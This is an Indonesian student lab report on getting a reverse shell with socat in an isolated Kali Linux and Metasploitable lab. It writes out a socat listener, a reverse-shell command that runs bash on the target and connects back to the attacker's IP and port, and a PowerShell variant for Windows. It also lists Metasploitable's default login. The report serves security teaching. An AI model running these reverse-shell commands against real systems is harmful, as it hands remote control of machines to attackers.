PRATIKUM KEAMANAN INFRASTRUKTUR JARINGAN KOMPUTER
“Lab 68. Mendapatkan Reverse Shell Menggunakan Socat”
DOSEN PENGAMPU:
HADI KURNIA SAPUTRA, S.Pd, M.Kom
OLEH:
Nama :Mutiah Lubis NIM : 20076011
PROGRAM STUDI PENDIDIKAN TEKNIK INFORMATIKA DEPARTEMEN TEKNIK ELEKTRONIKA
FAKULTAS TEKNIK
UNIVERSITAS NEGERI PADANG
2023
Lab 68. Mendapatkan Reverse Shell Menggunakan Socat
Identity
Nama : Mutiah Lubis NIM :20076011
Tujuan Lab:
Pelajari cara menggunakan alat socat untuk mendapatkan shell terbalik pada target.
Tujuan Lab:
Socat adalah utilitas berbasis baris perintah yang membentuk dua byte dua arah mengalirkan dan mentransfer data di antara mereka. Socat dapat digunakan untuk banyak orang tujuan yang berbeda karena keserbagunaannya.
Alat Lab:
Kali Linux dan Metasploitable VM.
Topologi Lab:
Anda dapat menggunakan Kali Linux di VM untuk lab ini.
Panduan Lab:
Tugas 1:
Di lab ini, kita akan menggunakan socat untuk membuat shell terbalik pada metasploitable mesin. Jika Anda tidak terbiasa dengan metasploitable, itu sengaja mesin rentan yang dapat dimuat di VMware, sama seperti Kali Linux. Anda dapat mengunduh file iso metasploitable di sini: https://docs.rapid7.com/metasploit/metasploitable-2/
Anda dapat menemukan banyak materi di halaman ini tentang cara mengunduh dan mengaturnya VM yang dapat dieksploitasi.
Kami akan menggunakan Kali Linux dan Metasploitable untuk lab ini. Ingatlah untuk letakkan kedua mesin di jaringan khusus host terisolasi yang sama untuk berbicara satu sama lain lainnya.
Saat login diperlukan, Anda akan memasukkan "msfadmin" sebagai nama pengguna dan kata sandi.
Tugas 2:
Socat sudah diinstal sebelumnya di Kali Linux. Perbedaan utama antara netcat dan socat adalah sintaks untuk menggunakan socat lebih sulit dipahami. Socat digunakan untuk membuat hubungan antara dua titik. Poin-poin ini bisa apa pun. Kami akan mulai dengan membuat shell terbalik yang menghubungkan Kali VM kami ke VM Metasploitable kami.
Pertama, mari cari tahu alamat IP eth0 dari VM Kali kita dan tuliskan. Kami akan menggunakan informasi ini di VM Metasploitable kami. Buka layar terminal di Kali VM dan ketik perintah ini:
ifconfig
192.168.56.103 adalah alamat IP Kali VM kami dalam hal ini.
Kemudian, buat pendengar di Kali VM kami dengan mengetikkan yang berikut ini:
socat TCP-L:8080 -
Ini membuat pendengar di Kali VM kami dan setara dengan mengetik “nc –lvnp 8080” di netcat.
Tugas 3:
Kami kemudian akan beralih ke VM Metasploitable kami dan ketik berikut ini terhubung kembali ke Kali VM kami:
socat TCP: 192.168.56.103:8080 EXEC:”bash -li”
Jika kami kembali ke terminal Kali kami dan mencoba menjalankan perintah seperti "id" dan
"whoami", kita dapat melihat bahwa kita telah berhasil membuat sebuah shell mesin metasploitable kami.
Ini adalah shell yang tidak stabil dan tidak interaktif, seperti yang Anda lihat prosesnya seperti SSH tidak berfungsi. crtl + c juga akan mematikan shell. Ini berguna teknik untuk mengetahui, bagaimanapun, jika netcat tidak bekerja. Socat adalah juga sangat serbaguna dan lebih mudah untuk menstabilkan cangkang, seperti yang akan Anda lihat di laboratorium nanti.
Jika kami mencoba membuat shell terbalik menggunakan socat di windows mesin, kita perlu mengubah sintaks dari perintah yang menghubungkan kembali ke mesin Kali kami dari mesin Windows. Sintaks akan ubah menjadi berikut ini:
socat TCP:<IP lokal Mesin Windows>:<port> EXEC:powershell.exe,pipes
Perintah ini akan menggunakan Windows Powershell alih-alih bash untuk membuat kerang. Opsi pipa memaksa PowerShell untuk menggunakan input standar gaya Unix dan keluaran, yang memudahkan kita untuk menggunakan shell.
